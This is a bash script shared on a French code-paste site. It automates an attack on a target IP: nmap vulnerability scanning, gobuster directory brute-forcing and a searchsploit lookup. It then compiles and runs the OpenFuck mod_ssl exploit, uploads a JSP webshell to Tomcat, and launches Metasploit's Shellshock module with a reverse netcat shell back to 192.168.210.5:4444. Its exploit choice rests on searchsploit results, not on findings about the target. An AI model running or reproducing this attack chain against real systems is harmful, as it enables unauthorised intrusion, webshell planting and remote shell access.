Voici votre URL de partage https://sharemycode.io/c/2033991 (Cliquer pour copier) (Copié)

#!/bin/bash

# Couleurs pour un affichage clair
GREEN='\033[0;32m'
RED='\033[0;31m'
NC='\033[0m' # Pas de couleur

# Demander l'IP cible
read -p "Entrez l'adresse IP de la cible (ex: 192.168.210.4) : " TARGET

echo -e "${GREEN}--- Début de l'analyse de la cible : $TARGET ---${NC}"

# 1️⃣ Scanner les ports et services actifs
echo -e "${GREEN}[1/6] Scan des ports ouverts et des vulnérabilités Apache...${NC}"
nmap -p 80 --script http-server-header,http-vuln* $TARGET -oN nmap_report.txt
echo -e "${GREEN}Résultats sauvegardés dans nmap_report.txt${NC}"

# 2️⃣ Trouver des fichiers et répertoires cachés
echo -e "${GREEN}[2/6] Scan des répertoires cachés avec Gobuster...${NC}"
gobuster dir -u http://$TARGET -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt,log,sql -o gobuster_report.txt
echo -e "${GREEN}Résultats sauvegardés dans gobuster_report.txt${NC}"

# 3️⃣ Vérifier les exploits disponibles
echo -e "${GREEN}[3/6] Recherche d'exploits pour Apache sur la cible...${NC}"
searchsploit apache 2.4.58 > exploits_apache.txt
echo -e "${GREEN}Résultats sauvegardés dans exploits_apache.txt${NC}"

# 4️⃣ Tester l'exploit OpenFuck si mod_ssl est vulnérable
if grep -q "mod_ssl" exploits_apache.txt; then
    echo -e "${RED}Vulnérabilité détectée dans mod_ssl!${NC}"
    searchsploit -m unix/remote/764.c
    gcc 764.c -o openfuck -lssl -lcrypto
    ./openfuck 0x6b http://$TARGET
fi

# 5️⃣ Tester l'exploit Tomcat JSP Upload si Apache Tomcat est détecté
if grep -q "Tomcat" exploits_apache.txt; then
    echo -e "${RED}Tomcat détecté ! Tentative d'upload d'un webshell...${NC}"
    searchsploit -m jsp/webapps/42966.py
    python3 42966.py -u http://$TARGET --upload shell.jsp
    echo -e "${GREEN}Webshell uploadé, accès ici : http://$TARGET/shell.jsp${NC}"
fi

# 6️⃣ Exploiter Apache avec Metasploit si vulnérable
if grep -q "mod_cgi" exploits_apache.txt; then
    echo -e "${RED}Tentative d'exécution de code avec Metasploit...${NC}"
    msfconsole -q -x "
        use exploit/unix/http/apache_mod_cgi_bash_env_exec;
        set RHOSTS $TARGET;
        set TARGETURI /;
        set PAYLOAD cmd/unix/reverse_netcat;
        set LHOST 192.168.210.5;
        set LPORT 4444;
        exploit"
fi

echo -e "${GREEN}--- SCAN ET TESTS TERMINÉS ---${NC}"
echo -e "📂 Résultats enregistrés dans :"
echo -e "  - nmap_report.txt"
echo -e "  - gobuster_report.txt"
echo -e "  - exploits_apache.txt"

Informations

Cet extrait a été créé le 22 janv. 2025 à 02:29:31

Cet extrait expire le 21 févr. 2025 à 02:29:31

Langage : bash

Logo bash

Link

Voici votre URL de partage : https://sharemycode.io/c/2033991 Copié